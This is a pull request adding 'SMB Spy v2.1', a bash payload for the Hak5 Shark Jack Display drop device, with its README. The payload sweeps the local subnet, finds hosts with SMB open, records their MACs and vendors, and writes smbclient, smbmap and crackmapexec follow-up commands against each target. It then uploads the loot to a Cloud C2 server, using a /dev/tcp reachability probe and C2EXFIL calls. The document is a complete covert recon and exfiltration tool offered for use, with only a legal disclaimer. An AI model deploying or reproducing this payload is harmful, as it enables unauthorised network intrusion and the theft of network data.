### PR TITLE
SMB Spy v2.1 - by Hackazillarex

### DIFF
--- a/payloads/library/recon/SMB_Spy/README.md
+++ b/payloads/library/recon/SMB_Spy/README.md
@@ -1,0 +1,92 @@
+SMB Spy v2.0
+
+Hak5 Shark Jack Display Payload
+
+Author: Hackazillarex
+
+Version: 2.0 (Shark Jack Display)
+
+Category: Network Recon / Discovery
+
+
+Description
+
+SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, and generates next-step command suggestions for further investigation — all from the device's built-in display interface.
+
+
+Features
+
+
+Ping sweep — counts live hosts on the subnet before the main scan so you know what you're working with
+SMB discovery — scans port 445 across the entire subnet using nmap
+Network context logging — captures your assigned IP, default gateway, and DNS server at the top of every loot file
+Scan timer — records exactly how long the SMB scan took
+MAC & vendor identification — logs hardware address and manufacturer for each SMB host found
+Next-step suggestions — writes ready-to-run smbclient, smbmap, and crackmapexec commands for every discovered target directly into the loot file
+Interactive results menu — browse discovered hosts on the display after the scan completes
+Loot file viewer — review previously saved scan results directly from the main menu without re-running a scan
+
+
+Loot
+
+All output is saved to /root/loot/smb_discovery/ on the device.
+
+Each scan run produces two files:
+
+FileContentssmb_hosts_YYYY-MM-DD_HH-MM-SS.txtParsed results, network info, scan timer, next-step suggestionsnmap_raw_YYYY-MM-DD_HH-MM-SS.txtRaw nmap output for the SMB scan
+
+Example Loot File Output
+=== SMB Spy v2.0 ===
+Timestamp: 2024-11-01_14-32-10
+My IP:   192.168.1.50
+Gateway: 192.168.1.1
+DNS:     192.168.1.1
+Network: 192.168.1.0/24
+--------------------------------
+Live hosts on subnet: 12
+Starting SMB discovery scan...
+Scan duration: 47s
+
+SMB OPEN: 192.168.1.10
+  MAC: AA:BB:CC:DD:EE:FF
+  Vendor: Dell Inc.
+
+SMB OPEN: 192.168.1.25
+  MAC: 11:22:33:44:55:66
+  Vendor: Hewlett Packard
+
+================================
+NEXT STEP SUGGESTIONS
+================================
+
+Target: 192.168.1.10
+  smbclient -L //192.168.1.10 -U user
+  smbmap -H 192.168.1.10 -u user -p pass
+  crackmapexec smb 192.168.1.10
+
+Target: 192.168.1.25
+  smbclient -L //192.168.1.25 -U user
+  smbmap -H 192.168.1.25 -u user -p pass
+  crackmapexec smb 192.168.1.25
+
+Menu Structure
+
+Main Menu
+├── Start SMB Spy       → runs full scan sequence
+├── View Loot Files     → browse saved scan results
+└── Quit
+
+Scan Sequence
+1. Wait for Ethernet link
+2. Request IP via DHCP
+3. Log network info (IP, gateway, DNS)
+4. Ping sweep → display live host count
+5. nmap -p 445 scan with progress bar
+6. Parse results → log SMB hosts + MAC/vendor
+7. Write next-step suggestions to loot file
+8. Display summary on screen
+9. Optional: browse results interactively
+
+Legal Notice
+
+This payload is intended for use on networks you own or have explicit written permission to test. Unauthorized network scanning may be illegal in your jurisdiction. The author assumes no liability for misuse.

--- a/payloads/library/recon/SMB_Spy/README.md
+++ b/payloads/library/recon/SMB_Spy/README.md
@@ -5,7 +5,7 @@ Version: 2.1 (Shark Jack Display + Cloud C2)
 Category: Network Recon / Discovery
 
 Description
-SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, generates next-step command suggestions for further investigation, and exfiltrates all loot to a paired Hak5 Cloud C2 instance — all from the device's built-in display interface.
+SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, generates next-step command suggestions for further investigation, and exfiltrates all loot to a paired Hak5 Cloud C2 instance — all from the device's built-in display interface. Cloud C2 is fully optional — the payload saves all loot locally regardless of C2 availability.
 
 Features
 Ping sweep — counts live hosts on the subnet before the main scan so you know what you're working with
@@ -16,7 +16,22 @@ MAC & vendor identification — logs hardware address and manufacturer for each 
 Next-step suggestions — writes ready-to-run smbclient, smbmap, and crackmapexec commands for every discovered target directly into the loot file
 Interactive results menu — browse discovered hosts on the display after the scan completes
 Loot file viewer — review previously saved scan results directly from the main menu without re-running a scan
-Cloud C2 exfiltration — automatically connects to a paired Hak5 Cloud C2 instance after each scan, sends a formatted summary via CLOUDLOG, and uploads both loot files for remote review
+Cloud C2 exfiltration — automatically connects to a paired Hak5 Cloud C2 instance after each scan, sends a formatted summary via CLOUDLOG, and uploads both loot files for remote review. Fully optional — works without C2.
+
+Cloud C2 Setup
+Cloud C2 exfiltration is optional. To enable it, place your device.config file in /etc/ on the Shark Jack:
+
+    scp device.config root@172.16.24.1:/etc/
+
+The payload reads the C2 host automatically from /etc/device.config. The default C2 port is 8080 and can be changed at the top of the payload in the setup_payload function:
+
+    C2_PORT="8080"  # Change this to match your C2 port
+
+C2 Failsafe Behavior
+No device.config found         → skips C2 entirely, saves loot locally, no delay
+device.config exists but C2 unreachable  → 10 second timeout, saves loot locally
+C2CONNECT hangs or times out   → 30 second timeout, saves loot locally
+C2 fully available             → uploads loot files and sends CLOUDLOG summary
 
 Loot
 All output is saved locally to /root/loot/smb_discovery/ on the device regardless of C2 availability.
@@ -26,7 +41,7 @@ File                                        Contents
 smb_hosts_YYYY-MM-DD_HH-MM-SS.txt          Parsed results, network info, scan timer, next-step suggestions
 nmap_raw_YYYY-MM-DD_HH-MM-SS.txt           Raw nmap output for the SMB scan
 
-Both files are also uploaded to your paired Cloud C2 instance and will appear under your device's loot tab.
+Both files are also uploaded to your paired Cloud C2 instance and will appear under your device's loot tab if C2 is available.
 
 Cloud C2 Summary Log
 After each scan the following summary is sent to C2 via CLOUDLOG:
@@ -96,11 +111,13 @@ Scan Sequence
 5.  nmap -p 445 scan with progress bar
 6.  Parse results → log SMB hosts + MAC/vendor
 7.  Write next-step suggestions to loot file
-8.  Connect to Cloud C2
-9.  Send CLOUDLOG summary to C2 dashboard
-10. Upload loot files to C2
-11. Display summary on screen
-12. Optional: browse results interactively
+8.  Check for device.config → skip C2 if not found
+9.  Check C2 reachability → skip if unreachable
+10. Connect to Cloud C2 with 30 second timeout
+11. Send CLOUDLOG summary to C2 dashboard
+12. Upload loot files to C2
+13. Display summary on screen
+14. Optional: browse results interactively
 
 
 Legal Notice

--- a/payloads/library/recon/SMB_Spy/README.md
+++ b/payloads/library/recon/SMB_Spy/README.md
@@ -1,22 +1,13 @@
-SMB Spy v2.0
-
+SMB Spy v2.1
 Hak5 Shark Jack Display Payload
-
 Author: Hackazillarex
-
-Version: 2.0 (Shark Jack Display)
-
+Version: 2.1 (Shark Jack Display + Cloud C2)
 Category: Network Recon / Discovery
 
-
 Description
-
-SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, and generates next-step command suggestions for further investigation — all from the device's built-in display interface.
-
+SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, generates next-step command suggestions for further investigation, and exfiltrates all loot to a paired Hak5 Cloud C2 instance — all from the device's built-in display interface.
 
 Features
-
-
 Ping sweep — counts live hosts on the subnet before the main scan so you know what you're working with
 SMB discovery — scans port 445 across the entire subnet using nmap
 Network context logging — captures your assigned IP, default gateway, and DNS server at the top of every loot file
@@ -25,18 +16,37 @@ MAC & vendor identification — logs hardware address and manufacturer for each 
 Next-step suggestions — writes ready-to-run smbclient, smbmap, and crackmapexec commands for every discovered target directly into the loot file
 Interactive results menu — browse discovered hosts on the display after the scan completes
 Loot file viewer — review previously saved scan results directly from the main menu without re-running a scan
-
+Cloud C2 exfiltration — automatically connects to a paired Hak5 Cloud C2 instance after each scan, sends a formatted summary via CLOUDLOG, and uploads both loot files for remote review
 
 Loot
-
-All output is saved to /root/loot/smb_discovery/ on the device.
-
+All output is saved locally to /root/loot/smb_discovery/ on the device regardless of C2 availability.
 Each scan run produces two files:
 
-FileContentssmb_hosts_YYYY-MM-DD_HH-MM-SS.txtParsed results, network info, scan timer, next-step suggestionsnmap_raw_YYYY-MM-DD_HH-MM-SS.txtRaw nmap output for the SMB scan
+File                                        Contents
+smb_hosts_YYYY-MM-DD_HH-MM-SS.txt          Parsed results, network info, scan timer, next-step suggestions
+nmap_raw_YYYY-MM-DD_HH-MM-SS.txt           Raw nmap output for the SMB scan
+
+Both files are also uploaded to your paired Cloud C2 instance and will appear under your device's loot tab.
+
+Cloud C2 Summary Log
+After each scan the following summary is sent to C2 via CLOUDLOG:
+
+==========================================
+SMB Spy v2.1 Scan Complete
+Timestamp:    2024-11-01_14-32-10
+Network:      192.168.1.0/24
+My IP:        192.168.1.50
+Live Hosts:   12
+SMB Hosts:    2
+Duration:     47s
+------------------------------------------
+SMB HOSTS FOUND:
+  192.168.1.10
+  192.168.1.25
+==========================================
 
 Example Loot File Output
-=== SMB Spy v2.0 ===
+=== SMB Spy v2.1 ===
 Timestamp: 2024-11-01_14-32-10
 My IP:   192.168.1.50
 Gateway: 192.168.1.1
@@ -69,24 +79,29 @@ Target: 192.168.1.25
   smbmap -H 192.168.1.25 -u user -p pass
   crackmapexec smb 192.168.1.25
 
-Menu Structure
+Scan complete in 47s
+Loot exfilled to C2
 
+Menu Structure
 Main Menu
 ├── Start SMB Spy       → runs full scan sequence
 ├── View Loot Files     → browse saved scan results
 └── Quit
 
 Scan Sequence
-1. Wait for Ethernet link
-2. Request IP via DHCP
-3. Log network info (IP, gateway, DNS)
-4. Ping sweep → display live host count
-5. nmap -p 445 scan with progress bar
-6. Parse results → log SMB hosts + MAC/vendor
-7. Write next-step suggestions to loot file
-8. Display summary on screen
-9. Optional: browse results interactively
+1.  Wait for Ethernet link
+2.  Request IP via DHCP
+3.  Log network info (IP, gateway, DNS)
+4.  Ping sweep → display live host count
+5.  nmap -p 445 scan with progress bar
+6.  Parse results → log SMB hosts + MAC/vendor
+7.  Write next-step suggestions to loot file
+8.  Connect to Cloud C2
+9.  Send CLOUDLOG summary to C2 dashboard
+10. Upload loot files to C2
+11. Display summary on screen
+12. Optional: browse results interactively
+
 
 Legal Notice
-
 This payload is intended for use on networks you own or have explicit written permission to test. Unauthorized network scanning may be illegal in your jurisdiction. The author assumes no liability for misuse.

--- a/payloads/library/recon/SMB_Spy/payload.txt
+++ b/payloads/library/recon/SMB_Spy/payload.txt
@@ -1,7 +1,7 @@
 #!/bin/bash
 # Title: SMB Spy Ported for the Shark Jack Display
-# Author: Hackazillarex
 # Description: Discovers SMB hosts using nmap and logs results with next-step suggestions
+# Author: Hackazillarex
 # Version: 2.1 (Shark Jack Display + Cloud C2)
 
 setup_payload() {

--- a/payloads/library/recon/SMB_Spy/payload.txt
+++ b/payloads/library/recon/SMB_Spy/payload.txt
@@ -15,6 +15,7 @@ setup_payload() {
   SCAN_END=0
   ELAPSED=0
   COUNT=0
+  C2_PORT="8080"  # Change this to match your C2 port
   LED SETUP
   mkdir -p "$LOOT_BASE"
 }
@@ -58,14 +59,37 @@ ping_sweep() {
 }
 
 exfil_to_c2() {
+  # Check if device.config exists before attempting C2
+  if [ ! -f /etc/device.config ]; then
+    log_both "No device.config found - loot saved locally only"
+    return
+  fi
+
   ALERT "Sending loot\nto C2..." 1 false
   CREATE_SPINNER "Uploading..."
-  C2CONNECT 2>/dev/null || {
+
+  # Read C2 host from device config
+  C2_HOST=$(cat /etc/device.config | grep -oE "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" | head -1)
+
+  # Fall back to localhost if parsing fails
+  C2_HOST=${C2_HOST:-"localhost"}
+
+  # Check C2 reachability before attempting connection
+  if ! timeout 10 bash -c "echo >/dev/tcp/$C2_HOST/$C2_PORT" 2>/dev/null; then
     STOP_SPINNER
     ALERT "C2 unavailable\nLoot saved locally" 2 false
     log_both "C2 unavailable - loot saved locally only"
     return
+  fi
+
+  # Attempt C2 connection with timeout (I think this is too redundant)
+  timeout 30 C2CONNECT 2>/dev/null || {
+    STOP_SPINNER
+    ALERT "C2 timed out\nLoot saved locally" 2 false
+    log_both "C2 timed out - loot saved locally only"
+    return
   }
+
   CLOUDLOG "==========================================" 2>/dev/null || true
   CLOUDLOG "SMB Spy v2.1 Scan Complete" 2>/dev/null || true
   CLOUDLOG "Timestamp:    $TS" 2>/dev/null || true
@@ -248,5 +272,5 @@ view_loot_files() {
 
 setup_payload
 initialize_menu
-ALERT "SMB Spy v2.1\nShark Jack\nDisplay\nby\nHackazillarex\n ← to Start" -1 false true
+ALERT "SMB Spy v2.1\nShark Jack\n Display\n by\n Hackazillarex\n ← to Start" -1 false true
 START_MENU

--- a/payloads/library/recon/SMB_Spy/payload.txt
+++ b/payloads/library/recon/SMB_Spy/payload.txt
@@ -68,7 +68,7 @@ exfil_to_c2() {
   ALERT "Sending loot\nto C2..." 1 false
   CREATE_SPINNER "Uploading..."
 
-  # Read C2 host from device config
+  # Read C2 host from device config ( probably should have used C2GETCONFIG here instead )
   C2_HOST=$(cat /etc/device.config | grep -oE "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" | head -1)
 
   # Fall back to localhost if parsing fails

--- a/payloads/library/recon/SMB_Spy/payload.txt
+++ b/payloads/library/recon/SMB_Spy/payload.txt
@@ -2,7 +2,7 @@
 # Title: SMB Spy Ported for the Shark Jack Display
 # Author: Hackazillarex
 # Description: Discovers SMB hosts using nmap and logs results with next-step suggestions
-# Version: 2.0 (Shark Jack Display)
+# Version: 2.1 (Shark Jack Display + Cloud C2)
 
 setup_payload() {
   LOOT_BASE="/root/loot/smb_discovery"
@@ -13,6 +13,8 @@ setup_payload() {
   CIDR=""
   SCAN_START=0
   SCAN_END=0
+  ELAPSED=0
+  COUNT=0
   LED SETUP
   mkdir -p "$LOOT_BASE"
 }
@@ -36,7 +38,6 @@ set_netmode_dhcp() {
 }
 
 log_network_info() {
-  # Log gateway, DNS, and our own IP 
   GW=$(ip route | awk '/default/ {print $3}')
   DNS=$(cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | head -1)
   log_both "My IP:   $IPADDR"
@@ -54,6 +55,38 @@ ping_sweep() {
   LOG "Live hosts: $LIVE_HOSTS"
   ALERT "$LIVE_HOSTS live host(s)\nfound on subnet" 2 false
   log_both "Live hosts on subnet: $LIVE_HOSTS"
+}
+
+exfil_to_c2() {
+  ALERT "Sending loot\nto C2..." 1 false
+  CREATE_SPINNER "Uploading..."
+  C2CONNECT 2>/dev/null || {
+    STOP_SPINNER
+    ALERT "C2 unavailable\nLoot saved locally" 2 false
+    log_both "C2 unavailable - loot saved locally only"
+    return
+  }
+  CLOUDLOG "==========================================" 2>/dev/null || true
+  CLOUDLOG "SMB Spy v2.1 Scan Complete" 2>/dev/null || true
+  CLOUDLOG "Timestamp:    $TS" 2>/dev/null || true
+  CLOUDLOG "Network:      $CIDR" 2>/dev/null || true
+  CLOUDLOG "My IP:        $IPADDR" 2>/dev/null || true
+  CLOUDLOG "Live Hosts:   $LIVE_HOSTS" 2>/dev/null || true
+  CLOUDLOG "SMB Hosts:    $COUNT" 2>/dev/null || true
+  CLOUDLOG "Duration:     ${ELAPSED}s" 2>/dev/null || true
+  if [ "$COUNT" -gt 0 ]; then
+    CLOUDLOG "------------------------------------------" 2>/dev/null || true
+    CLOUDLOG "SMB HOSTS FOUND:" 2>/dev/null || true
+    for ip in "${SMB_IPS[@]}"; do
+      CLOUDLOG "  $ip" 2>/dev/null || true
+    done
+  fi
+  CLOUDLOG "==========================================" 2>/dev/null || true
+  C2EXFIL STRING "$OUTFILE" "smb_hosts" 2>/dev/null || true
+  C2EXFIL STRING "$RAWFILE" "nmap_raw" 2>/dev/null || true
+  STOP_SPINNER
+  log_both "Loot exfilled to C2"
+  ALERT "Loot uploaded\nto C2!" 2 false
 }
 
 execute_scan() {
@@ -81,15 +114,15 @@ execute_scan() {
     return
   fi
 
-  # Log network context 
-  log_both "=== SMB Spy v2.0 ==="
+  # Log network context
+  log_both "=== SMB Spy v2.1 ==="
   log_both "Timestamp: $TS"
   log_network_info
 
-  # Ping sweep for live host count 
+  # Ping sweep
   ping_sweep
 
-  # Start scan timer 
+  # Start scan timer
   SCAN_START=$(date +%s)
   log_both "Starting SMB discovery scan..."
   ALERT "Scanning:\n$CIDR" 2 false
@@ -109,7 +142,7 @@ execute_scan() {
     SET_PROGRESS $COMPLETE
   done
 
-  # Stop scan timer 
+  # Stop scan timer
   SCAN_END=$(date +%s)
   ELAPSED=$((SCAN_END - SCAN_START))
   log_both "Scan duration: ${ELAPSED}s"
@@ -159,6 +192,11 @@ execute_scan() {
   log_both "Loot: $OUTFILE"
 
   LED FINISH
+
+  # Exfil to C2
+  COUNT="${#SMB_IPS[@]}"
+  exfil_to_c2
+
   show_scan_summary
 }
 
@@ -210,5 +248,5 @@ view_loot_files() {
 
 setup_payload
 initialize_menu
-ALERT "SMB Spy v2.0\nShark Jack Display\n← to Start" -1 false true
+ALERT "SMB Spy v2.1\nShark Jack\nDisplay\nby\nHackazillarex\n ← to Start" -1 false true
 START_MENU

--- a/payloads/library/recon/SMB_Spy/payload.txt
+++ b/payloads/library/recon/SMB_Spy/payload.txt
@@ -1,0 +1,214 @@
+#!/bin/bash
+# Title: SMB Spy Ported for the Shark Jack Display
+# Author: Hackazillarex
+# Description: Discovers SMB hosts using nmap and logs results with next-step suggestions
+# Version: 2.0 (Shark Jack Display)
+
+setup_payload() {
+  LOOT_BASE="/root/loot/smb_discovery"
+  OUTFILE=""
+  RAWFILE=""
+  SMB_IPS=()
+  IPADDR=""
+  CIDR=""
+  SCAN_START=0
+  SCAN_END=0
+  LED SETUP
+  mkdir -p "$LOOT_BASE"
+}
+
+log_both() {
+  LOG "$1"
+  echo "$1" >> "$OUTFILE"
+}
+
+initialize_menu() {
+  ADD_MENU_ITEM "Start SMB Spy" "execute_scan"
+  ADD_MENU_ITEM "View Loot Files" "view_loot_files"
+  ADD_MENU_ITEM "Quit" "EXIT_MENU"
+}
+
+set_netmode_dhcp() {
+  NETMODE DHCP_CLIENT
+  WAIT_FOR_IP
+  IPADDR=$(ip -o -4 addr show eth0 | awk '{print $4}' | cut -d/ -f1)
+  LOG "Got IP: $IPADDR"
+}
+
+log_network_info() {
+  # Log gateway, DNS, and our own IP 
+  GW=$(ip route | awk '/default/ {print $3}')
+  DNS=$(cat /etc/resolv.conf | awk '/nameserver/ {print $2}' | head -1)
+  log_both "My IP:   $IPADDR"
+  log_both "Gateway: $GW"
+  log_both "DNS:     $DNS"
+  log_both "Network: $CIDR"
+  log_both "--------------------------------"
+}
+
+ping_sweep() {
+  ALERT "Running ping\nsweep first..." 1 false
+  CREATE_SPINNER "Ping Sweep..."
+  LIVE_HOSTS=$(nmap -sn "$CIDR" | grep "Nmap scan report" | wc -l)
+  STOP_SPINNER
+  LOG "Live hosts: $LIVE_HOSTS"
+  ALERT "$LIVE_HOSTS live host(s)\nfound on subnet" 2 false
+  log_both "Live hosts on subnet: $LIVE_HOSTS"
+}
+
+execute_scan() {
+  LED ATTACK
+  SMB_IPS=()
+
+  TS=$(date +%F_%H-%M-%S)
+  OUTFILE="$LOOT_BASE/smb_hosts_$TS.txt"
+  RAWFILE="$LOOT_BASE/nmap_raw_$TS.txt"
+  touch "$OUTFILE" "$RAWFILE" || {
+    ALERT "ERROR: Cannot\nwrite loot files" 3 false
+    return
+  }
+
+  # Wait for link and get network info
+  ALERT "Waiting for\nlink..." 1 false
+  WAIT_FOR_LINK
+  set_netmode_dhcp
+
+  # Determine CIDR
+  CIDR=$(ip -4 route show dev eth0 | awk '/scope link/ {print $1}')
+  if [ -z "$CIDR" ]; then
+    ALERT "Failed to get\nnetwork CIDR" 3 false
+    LED FINISH
+    return
+  fi
+
+  # Log network context 
+  log_both "=== SMB Spy v2.0 ==="
+  log_both "Timestamp: $TS"
+  log_network_info
+
+  # Ping sweep for live host count 
+  ping_sweep
+
+  # Start scan timer 
+  SCAN_START=$(date +%s)
+  log_both "Starting SMB discovery scan..."
+  ALERT "Scanning:\n$CIDR" 2 false
+
+  # Run nmap with progress bar
+  CREATE_PROGRESS_BAR "SMB Spy"
+  nmap -p 445 -n "$CIDR" --stats-every 1s > "$RAWFILE" 2>&1 &
+  pidof_nmap=$!
+
+  while true; do
+    sleep 0.5
+    COMPLETE="$(cat "$RAWFILE" | grep "remaining" | awk '{print $6}' | tail -n1 | cut -d'.' -f1)"
+    if [ -z "$(ps | grep $pidof_nmap | grep -v grep)" ]; then
+      SET_PROGRESS 100
+      break
+    fi
+    SET_PROGRESS $COMPLETE
+  done
+
+  # Stop scan timer 
+  SCAN_END=$(date +%s)
+  ELAPSED=$((SCAN_END - SCAN_START))
+  log_both "Scan duration: ${ELAPSED}s"
+
+  # Parse nmap results
+  CURRENT_IP=""
+  FOUND=0
+
+  while read -r line; do
+    if echo "$line" | grep -q "Nmap scan report for"; then
+      CURRENT_IP=$(echo "$line" | awk '{print $NF}')
+    fi
+    if echo "$line" | grep -q "445/tcp open"; then
+      log_both ""
+      log_both "SMB OPEN: $CURRENT_IP"
+      SMB_IPS+=("$CURRENT_IP")
+      FOUND=1
+    fi
+    if echo "$line" | grep -q "MAC Address" && [ "$FOUND" -eq 1 ]; then
+      MAC=$(echo "$line" | cut -d '(' -f1 | awk '{print $3}')
+      VENDOR=$(echo "$line" | sed 's/.*(//;s/)//')
+      log_both "  MAC: $MAC"
+      log_both "  Vendor: $VENDOR"
+      FOUND=0
+    fi
+  done < "$RAWFILE"
+
+  # Write next-step suggestions
+  log_both ""
+  log_both "================================"
+  log_both "NEXT STEP SUGGESTIONS"
+  log_both "================================"
+  if [ "${#SMB_IPS[@]}" -eq 0 ]; then
+    log_both "No SMB hosts found."
+  else
+    for ip in "${SMB_IPS[@]}"; do
+      log_both ""
+      log_both "Target: $ip"
+      log_both "  smbclient -L //$ip -U user"
+      log_both "  smbmap -H $ip -u user -p pass"
+      log_both "  crackmapexec smb $ip"
+    done
+  fi
+
+  log_both ""
+  log_both "Scan complete in ${ELAPSED}s"
+  log_both "Loot: $OUTFILE"
+
+  LED FINISH
+  show_scan_summary
+}
+
+show_scan_summary() {
+  COUNT="${#SMB_IPS[@]}"
+  ALERT "Done in ${ELAPSED}s\n$COUNT SMB host(s)\nfound." 3 false
+  ALERT "Done in ${ELAPSED}s\n$COUNT SMB host(s)\nfound.\n← Continue" -1 false
+
+  if [ "$COUNT" -gt 0 ]; then
+    RESP="$(OPTION_DIALOG "View Results?" " Yes " " No ")"
+    if [ "$RESP" = " Yes " ]; then
+      build_results_menu
+    fi
+  fi
+}
+
+build_results_menu() {
+  CLEAR_MENU "smb_results"
+  CREATE_SPINNER "Loading..."
+
+  for ip in "${SMB_IPS[@]}"; do
+    ADD_SUBMENU_ITEM "smb_results" "$ip" "smb_host_menu_${ip}"
+    ADD_SUBMENU_ITEM "smb_host_menu_${ip}" "smbclient" "noop"
+    ADD_SUBMENU_ITEM "smb_host_menu_${ip}" "smbmap" "noop"
+    ADD_SUBMENU_ITEM "smb_host_menu_${ip}" "crackmapexec" "noop"
+    ADD_SUBMENU_ITEM "smb_host_menu_${ip}" "Back" "Back"
+  done
+
+  ADD_SUBMENU_ITEM "smb_results" "Back" "Back"
+  STOP_SPINNER
+  SELECT_MENU smb_results
+}
+
+view_loot_files() {
+  FILES=$(ls "$LOOT_BASE"/*.txt 2>/dev/null | xargs -n1 basename | tr '\n' ' ')
+  if [ -z "$FILES" ]; then
+    ALERT "No loot files\nfound yet." 2 false
+    return
+  fi
+  RESP="$(LIST_PICKER "Loot Files" "$FILES" "$(echo $FILES | awk '{print $1}')")"
+  case "$RESP" in
+    "← Back") ;;
+    *)
+      PREVIEW=$(head -20 "$LOOT_BASE/$RESP" | tr '\n' '|' | sed 's/|/\\n/g')
+      ALERT "$PREVIEW" -1 false true
+    ;;
+  esac
+}
+
+setup_payload
+initialize_menu
+ALERT "SMB Spy v2.0\nShark Jack Display\n← to Start" -1 false true
+START_MENU


### PR DESCRIPTION
SMB Spy v2.1
Hak5 Shark Jack Display Payload
Author: Hackazillarex
Version: 2.1 (Shark Jack Display + Cloud C2)
Category: Network Recon / Discovery

Description
SMB Spy is a network reconnaissance payload for the Hak5 Shark Jack Display. It automatically discovers live hosts on the local subnet, scans for open SMB (port 445) services, logs MAC addresses and vendor information, generates next-step command suggestions for further investigation, and exfiltrates all loot to a paired Hak5 Cloud C2 instance — all from the device's built-in display interface. Cloud C2 is fully optional — the payload saves all loot locally regardless of C2 availability.

Features
Ping sweep — counts live hosts on the subnet before the main scan so you know what you're working with
SMB discovery — scans port 445 across the entire subnet using nmap
Network context logging — captures your assigned IP, default gateway, and DNS server at the top of every loot file
Scan timer — records exactly how long the SMB scan took
MAC & vendor identification — logs hardware address and manufacturer for each SMB host found
Next-step suggestions — writes ready-to-run smbclient, smbmap, and crackmapexec commands for every discovered target directly into the loot file
Interactive results menu — browse discovered hosts on the display after the scan completes
Loot file viewer — review previously saved scan results directly from the main menu without re-running a scan
Cloud C2 exfiltration — automatically connects to a paired Hak5 Cloud C2 instance after each scan, sends a formatted summary via CLOUDLOG, and uploads both loot files for remote review. Fully optional — works without C2.

Cloud C2 Setup
Cloud C2 exfiltration is optional. To enable it, place your device.config file in /etc/ on the Shark Jack:

    scp device.config root@172.16.24.1:/etc/

The payload reads the C2 host automatically from /etc/device.config. The default C2 port is 8080 and can be changed at the top of the payload in the setup_payload function:

    C2_PORT="8080"  # Change this to match your C2 port

C2 Failsafe Behavior
No device.config found         → skips C2 entirely, saves loot locally, no delay
device.config exists but C2 unreachable  → 10 second timeout, saves loot locally
C2CONNECT hangs or times out   → 30 second timeout, saves loot locally
C2 fully available             → uploads loot files and sends CLOUDLOG summary

Loot
All output is saved locally to /root/loot/smb_discovery/ on the device regardless of C2 availability.
Each scan run produces two files:

File                                        Contents
smb_hosts_YYYY-MM-DD_HH-MM-SS.txt          Parsed results, network info, scan timer, next-step suggestions
nmap_raw_YYYY-MM-DD_HH-MM-SS.txt           Raw nmap output for the SMB scan

Both files are also uploaded to your paired Cloud C2 instance and will appear under your device's loot tab if C2 is available.

Cloud C2 Summary Log
After each scan the following summary is sent to C2 via CLOUDLOG:

==========================================
SMB Spy v2.1 Scan Complete
Timestamp:    2024-11-01_14-32-10
Network:      192.168.1.0/24
My IP:        192.168.1.50
Live Hosts:   12
SMB Hosts:    2
Duration:     47s
------------------------------------------
SMB HOSTS FOUND:
  192.168.1.10
  192.168.1.25
==========================================

Example Loot File Output
=== SMB Spy v2.1 ===
Timestamp: 2024-11-01_14-32-10
My IP:   192.168.1.50
Gateway: 192.168.1.1
DNS:     192.168.1.1
Network: 192.168.1.0/24
--------------------------------
Live hosts on subnet: 12
Starting SMB discovery scan...
Scan duration: 47s

SMB OPEN: 192.168.1.10
  MAC: AA:BB:CC:DD:EE:FF
  Vendor: Dell Inc.

SMB OPEN: 192.168.1.25
  MAC: 11:22:33:44:55:66
  Vendor: Hewlett Packard

================================
NEXT STEP SUGGESTIONS
================================

Target: 192.168.1.10
  smbclient -L //192.168.1.10 -U user
  smbmap -H 192.168.1.10 -u user -p pass
  crackmapexec smb 192.168.1.10

Target: 192.168.1.25
  smbclient -L //192.168.1.25 -U user
  smbmap -H 192.168.1.25 -u user -p pass
  crackmapexec smb 192.168.1.25

Scan complete in 47s
Loot exfilled to C2

Menu Structure
Main Menu
├── Start SMB Spy       → runs full scan sequence
├── View Loot Files     → browse saved scan results
└── Quit

Scan Sequence
1.  Wait for Ethernet link
2.  Request IP via DHCP
3.  Log network info (IP, gateway, DNS)
4.  Ping sweep → display live host count
5.  nmap -p 445 scan with progress bar
6.  Parse results → log SMB hosts + MAC/vendor
7.  Write next-step suggestions to loot file
8.  Check for device.config → skip C2 if not found
9.  Check C2 reachability → skip if unreachable
10. Connect to Cloud C2 with 30 second timeout
11. Send CLOUDLOG summary to C2 dashboard
12. Upload loot files to C2
13. Display summary on screen
14. Optional: browse results interactively


Legal Notice
This payload is intended for use on networks you own or have explicit written permission to test. Unauthorized network scanning may be illegal in your jurisdiction. The author assumes no liability for misuse.
